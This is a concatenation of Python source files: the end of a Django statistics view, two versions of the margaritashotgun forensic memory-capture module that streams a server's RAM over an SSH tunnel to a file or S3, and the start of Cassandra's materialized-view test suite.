'theftsInPoly': theftsInPoly,
# 'collisionsOutPoly': collisions.exclude(pk__in=collisionsInPoly),
# 'nearmissesOutPoly': nearmisses.exclude(pk__in=nearmissesInPoly),
# 'hazardsOutPoly': hazards.exclude(pk__in=hazardsInPoly),
# 'theftsOutPoly': thefts.exclude(pk__in=theftsInPoly),
}
return render(request, 'mapApp/stats.html', context)
|
from progressbar import ProgressBar, Percentage, Bar, ETA, FileTransferSpeed
from enum import Enum
import errno
import select
import socket
import s3fs
import logging
from margaritashotgun.exceptions import *
logger = logging.getLogger(__name__)
class OutputDestinations(Enum):
local = 'local'
s3 = 's3'
class Memory():
def __init__(self, remote_addr, mem_size, progressbar=False,
recv_size=1048576, sock_timeout=1):
"""
:type remote_addr: str
:param remote_addr: hostname or ip address of target server
:type mem_size: int
:param mem_size: target server memory size in bytes
:type progressbar: bool
:param progressbar: ncurses progress bar toggle
:type recv_size: int
:param recv_size: transfer socket max receive size
:type sock_timeout: int
:param sock_timeout: transfer socket receive timeout
"""
self.mem_size = mem_size
self.progressbar = progressbar
self.recv_size = recv_size
self.sock_timeout = sock_timeout
self.padding_percentage = 0.03
self.max_size = self.max_size(mem_size, self.padding_percentage)
self.update_interval = 5
self.update_threshold = recv_size * self.update_interval
self.remote_addr = remote_addr
self.transfered = 0
self.progress = 0
self.widgets = [' {0} '.format(remote_addr), Percentage(), ' ', Bar(),
' ', ETA(), ' ', FileTransferSpeed()]
self.sock = None
self.outfile = None
self.bar = None
def max_size(self, mem_size, padding_percentage):
"""
Calculates the excpected size in bytes of the memory capture
:type mem_size: int
:param mem_size: target server memory in bytes
:type padding_percentage: float
:param padding_percentage: Output overhead of lime format
"""
size_in_kb = mem_size + mem_size * padding_percentage
return size_in_kb * 1024
def capture(self, tunnel_addr, tunnel_port, filename=None,
bucket=None, destination=None):
"""
Captures memory based on the provided OutputDestination
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
:type filename: str
:param filename: memory dump output filename
:type bucket: str
:param bucket: output s3 bucket
:type destination: :py:class:`margaritashotgun.memory.OutputDestinations`
:param destination: OutputDestinations member
"""
if filename is None:
raise MemoryCaptureAttributeMissingError('filename')
if destination == OutputDestinations.local:
logger.info("{0}: dumping to file://{1}".format(self.remote_addr,
filename))
result = self.to_file(filename, tunnel_addr, tunnel_port)
elif destination == OutputDestinations.s3:
if bucket is None:
raise MemoryCaptureAttributeMissingError('bucket')
logger.info(("{0}: dumping memory to s3://{1}/"
"{2}".format(self.remote_addr, bucket, filename)))
result = self.to_s3(bucket, filename, tunnel_addr, tunnel_port)
else:
raise MemoryCaptureOutputMissingError(self.remote_addr)
return result
def to_file(self, filename, tunnel_addr, tunnel_port):
"""
Writes memory dump to a local file
:type filename: str
:param filename: memory dump output filename
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
"""
if self.progressbar:
self.bar = ProgressBar(widgets=self.widgets,
maxval=self.max_size).start()
self.bar.start()
with open(filename, 'wb') as self.outfile:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((tunnel_addr, tunnel_port))
self.sock.settimeout(self.sock_timeout)
bytes_since_update = 0
while True:
try:
data = self.sock.recv(self.recv_size)
data_length = len(data)
if not data:
break
self.outfile.write(data)
self.transfered = self.transfered + data_length
bytes_since_update += data_length
data = None
data_length = 0
if bytes_since_update > self.update_threshold:
self.update_progress()
bytes_since_update = 0
except (socket.timeout, socket.error) as ex:
if isinstance(ex, socket.timeout):
break
elif isinstance(ex, socket.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
else:
self.cleanup()
raise
self.cleanup()
logger.info('{0}: capture complete: {1}'.format(self.remote_addr,
filename))
return True
def to_s3(self, bucket, filename, tunnel_addr, tunnel_port):
"""
Writes memory dump to s3 bucket
:type bucket: str
:param bucket: memory dump output s3 bucket
:type filename: str
:param filename: memory dump output filename
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
"""
if self.progressbar:
self.bar = ProgressBar(widgets=self.widgets,
maxval=self.max_size).start()
self.bar.start()
s3 = s3fs.S3FileSystem(anon=False)
with s3.open('{0}/{1}'.format(bucket, filename), 'wb') as self.outfile:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((tunnel_addr, tunnel_port))
self.sock.settimeout(self.sock_timeout)
bytes_since_update = 0
while True:
try:
data = self.sock.recv(self.recv_size)
data_length = len(data)
if not data:
break
self.outfile.write(data)
self.transfered = self.transfered + data_length
bytes_since_update = bytes_since_update + data_length
data = None
data_length = 0
if bytes_since_update > self.update_threshold:
self.update_progress()
bytes_since_update = 0
except (socket.timeout, socket.error, select.error) as ex:
if isinstance(ex, socket.timeout):
break
elif isinstance(ex, socket.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
elif isinstance(ex, select.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
else:
self.cleanup()
raise
self.cleanup()
logger.info('{0}: capture complete: s3://{1}/{2}'.format(self.remote_addr,
bucket,
filename))
return True
def update_progress(self, complete=False):
"""
Logs capture progress
:type complete: bool
:params complete: toggle to finish ncurses progress bar
"""
if self.progressbar:
try:
self.bar.update(self.transfered)
except Exception as e:
logger.warn("{0}: {1}, {2} exceeds memsize {3}".format(
self.remote_addr,
e,
self.transfered,
self.max_size))
if complete:
self.bar.update(self.max_size)
self.bar.finish()
else:
percent = int(100 * float(self.transfered) / float(self.max_size))
# printe a message at 10%, 20%, etc...
if percent % 10 == 0:
if self.progress != percent:
logger.info("{0}: capture {1}% complete".format(
self.remote_addr, percent))
self.progress = percent
def cleanup(self):
"""
Release resources used during memory capture
"""
if self.sock is not None:
self.sock.close()
if self.outfile is not None:
self.outfile.close()
if self.bar is not None:
self.update_progress(complete=True)
Added comment for the exceeds memsize warning
from progressbar import ProgressBar, Percentage, Bar, ETA, FileTransferSpeed
from enum import Enum
import errno
import select
import socket
import s3fs
import logging
from margaritashotgun.exceptions import *
logger = logging.getLogger(__name__)
class OutputDestinations(Enum):
local = 'local'
s3 = 's3'
class Memory():
def __init__(self, remote_addr, mem_size, progressbar=False,
recv_size=1048576, sock_timeout=1):
"""
:type remote_addr: str
:param remote_addr: hostname or ip address of target server
:type mem_size: int
:param mem_size: target server memory size in bytes
:type progressbar: bool
:param progressbar: ncurses progress bar toggle
:type recv_size: int
:param recv_size: transfer socket max receive size
:type sock_timeout: int
:param sock_timeout: transfer socket receive timeout
"""
self.mem_size = mem_size
self.progressbar = progressbar
self.recv_size = recv_size
self.sock_timeout = sock_timeout
self.padding_percentage = 0.03
self.max_size = self.max_size(mem_size, self.padding_percentage)
self.update_interval = 5
self.update_threshold = recv_size * self.update_interval
self.remote_addr = remote_addr
self.transfered = 0
self.progress = 0
self.widgets = [' {0} '.format(remote_addr), Percentage(), ' ', Bar(),
' ', ETA(), ' ', FileTransferSpeed()]
self.sock = None
self.outfile = None
self.bar = None
def max_size(self, mem_size, padding_percentage):
"""
Calculates the excpected size in bytes of the memory capture
:type mem_size: int
:param mem_size: target server memory in bytes
:type padding_percentage: float
:param padding_percentage: Output overhead of lime format
"""
size_in_kb = mem_size + mem_size * padding_percentage
return size_in_kb * 1024
def capture(self, tunnel_addr, tunnel_port, filename=None,
bucket=None, destination=None):
"""
Captures memory based on the provided OutputDestination
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
:type filename: str
:param filename: memory dump output filename
:type bucket: str
:param bucket: output s3 bucket
:type destination: :py:class:`margaritashotgun.memory.OutputDestinations`
:param destination: OutputDestinations member
"""
if filename is None:
raise MemoryCaptureAttributeMissingError('filename')
if destination == OutputDestinations.local:
logger.info("{0}: dumping to file://{1}".format(self.remote_addr,
filename))
result = self.to_file(filename, tunnel_addr, tunnel_port)
elif destination == OutputDestinations.s3:
if bucket is None:
raise MemoryCaptureAttributeMissingError('bucket')
logger.info(("{0}: dumping memory to s3://{1}/"
"{2}".format(self.remote_addr, bucket, filename)))
result = self.to_s3(bucket, filename, tunnel_addr, tunnel_port)
else:
raise MemoryCaptureOutputMissingError(self.remote_addr)
return result
def to_file(self, filename, tunnel_addr, tunnel_port):
"""
Writes memory dump to a local file
:type filename: str
:param filename: memory dump output filename
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
"""
if self.progressbar:
self.bar = ProgressBar(widgets=self.widgets,
maxval=self.max_size).start()
self.bar.start()
with open(filename, 'wb') as self.outfile:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((tunnel_addr, tunnel_port))
self.sock.settimeout(self.sock_timeout)
bytes_since_update = 0
while True:
try:
data = self.sock.recv(self.recv_size)
data_length = len(data)
if not data:
break
self.outfile.write(data)
self.transfered = self.transfered + data_length
bytes_since_update += data_length
data = None
data_length = 0
if bytes_since_update > self.update_threshold:
self.update_progress()
bytes_since_update = 0
except (socket.timeout, socket.error) as ex:
if isinstance(ex, socket.timeout):
break
elif isinstance(ex, socket.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
else:
self.cleanup()
raise
self.cleanup()
logger.info('{0}: capture complete: {1}'.format(self.remote_addr,
filename))
return True
def to_s3(self, bucket, filename, tunnel_addr, tunnel_port):
"""
Writes memory dump to s3 bucket
:type bucket: str
:param bucket: memory dump output s3 bucket
:type filename: str
:param filename: memory dump output filename
:type tunnel_addr: str
:param tunnel_port: ssh tunnel hostname or ip
:type tunnel_port: int
:param tunnel_port: ssh tunnel port
"""
if self.progressbar:
self.bar = ProgressBar(widgets=self.widgets,
maxval=self.max_size).start()
self.bar.start()
s3 = s3fs.S3FileSystem(anon=False)
with s3.open('{0}/{1}'.format(bucket, filename), 'wb') as self.outfile:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((tunnel_addr, tunnel_port))
self.sock.settimeout(self.sock_timeout)
bytes_since_update = 0
while True:
try:
data = self.sock.recv(self.recv_size)
data_length = len(data)
if not data:
break
self.outfile.write(data)
self.transfered = self.transfered + data_length
bytes_since_update = bytes_since_update + data_length
data = None
data_length = 0
if bytes_since_update > self.update_threshold:
self.update_progress()
bytes_since_update = 0
except (socket.timeout, socket.error, select.error) as ex:
if isinstance(ex, socket.timeout):
break
elif isinstance(ex, socket.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
elif isinstance(ex, select.error):
if ex.errno == errno.EINTR:
pass
else:
self.cleanup()
raise
else:
self.cleanup()
raise
self.cleanup()
logger.info('{0}: capture complete: s3://{1}/{2}'.format(self.remote_addr,
bucket,
filename))
return True
def update_progress(self, complete=False):
"""
Logs capture progress
:type complete: bool
:params complete: toggle to finish ncurses progress bar
"""
if self.progressbar:
try:
self.bar.update(self.transfered)
except Exception as e:
# This is just a math problem, doesn't effect anything.
logger.warn("{0}: {1}, {2} exceeds memsize {3}".format(
self.remote_addr,
e,
self.transfered,
self.max_size))
if complete:
self.bar.update(self.max_size)
self.bar.finish()
else:
percent = int(100 * float(self.transfered) / float(self.max_size))
# printe a message at 10%, 20%, etc...
if percent % 10 == 0:
if self.progress != percent:
logger.info("{0}: capture {1}% complete".format(
self.remote_addr, percent))
self.progress = percent
def cleanup(self):
"""
Release resources used during memory capture
"""
if self.sock is not None:
self.sock.close()
if self.outfile is not None:
self.outfile.close()
if self.bar is not None:
self.update_progress(complete=True)
|
import time
import collections
import sys
import traceback
import re
from functools import partial
# TODO add in requirements.txt
from enum import Enum # Remove when switching to py3
from multiprocessing import Process, Queue
from unittest import skipIf
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from dtest import Tester, debug
from tools import since, new_node
from assertions import assert_all, assert_one, assert_invalid, assert_unavailable, assert_none, assert_crc_check_chance_equal
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def prepare(self, user_table=False, rf=1, options=None, nodes=3):
cluster = self.cluster
cluster.populate([nodes, 0])
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
self.create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
def _replay_batchlogs(self):
debug("Replaying batchlog on all nodes")
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
def create_test(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting 1 materialized view, got" + str(result))
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the bease table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def insert_test(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def populate_mv_after_insert_test(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
def crc_check_chance_test(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def prepared_statement_test(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
self.assertEqual(len(result), 4, "Expecting {} users, got {}".format(4, len(result)))
result = list(session.execute(selectPrepared.bind(['TX'])))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute(selectPrepared.bind(['CA'])))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
result = list(session.execute(selectPrepared.bind(['MA'])))
self.assertEqual(len(result), 0, "Expecting {} users, got {}".format(0, len(result)))
def immutable_test(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def drop_mv_test(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 2, "Expecting {} materialized view, got {}".format(2, len(result)))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
def drop_column_test(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(len(result), 1, "Expecting {} materialized view, got {}".format(1, len(result)))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state, depended on by materialized views"
)
def drop_table_test(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 1,
"Expecting {} materialized view, got {}".format(1, len(result))
)
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
self.assertEqual(
len(result), 0,
"Expecting {} materialized view, got {}".format(1, len(result))
)
def clustering_column_test(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare()
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
self.assertEqual(len(result), 2, "Expecting {} users, got {}".format(2, len(result)))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
self.assertEqual(len(result), 1, "Expecting {} users, got {}".format(1, len(result)))
def _add_dc_after_mv_test(self, rf):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
debug("Writing 1k to base")
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
debug("Reading 1k from view")
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
debug("Reading 1k from base")
for i in xrange(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_other_notice=True, wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
debug("Verifying data from new node in view")
for i in xrange(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
debug("Inserting 100 into base")
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
debug("Verify 100 in view")
for i in xrange(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_dc_after_mv_simple_replication_test(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1)
def add_dc_after_mv_network_replication_test(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1, 'dc2': 1})
def add_node_after_mv_test(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in xrange(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def add_write_survey_node_after_mv_test(self):
"""
@jira_ticket CASSANDRA-10621
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node in write survey mode.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster)
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
for i in xrange(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in xrange(1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def allow_filtering_test(self):
"""Test that allow filtering works as usual for a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in xrange(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
for i in xrange(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=i), [i, i, 'a', 3.0])
rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
self.assertEqual(len(rows), 1000, "Expected 1000 rows but got {}".format(len(rows)))
assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")
for i in xrange(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(i),
[i, i, 'a', 3.0]
)
assert_one(
session,
"SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(i),
['a', i, i, 3.0]
)
def secondary_index_test(self):
"""Test that secondary indexes cannot be created on a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
assert_invalid(session, "CREATE INDEX ON t_by_v (v2)",
"Secondary indexes are not supported on materialized views")
def ttl_test(self):
"""
Test that TTL works as expected for a materialized view
@expected_result The TTL is propagated properly between tables.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
"WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))
for i in xrange(100):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=i))
for i in xrange(100):
assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(i), [i, i, i, i])
time.sleep(20)
rows = list(session.execute("SELECT * FROM t_by_v2"))
self.assertEqual(len(rows), 0, "Expected 0 rows but got {}".format(len(rows)))
def query_all_new_column_test(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
self.assertEqual(len(results), 1)
self.assertTrue(hasattr(results[0], 'first_name'), 'Column "first_name" not found')
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def query_new_column_test(self):
"""
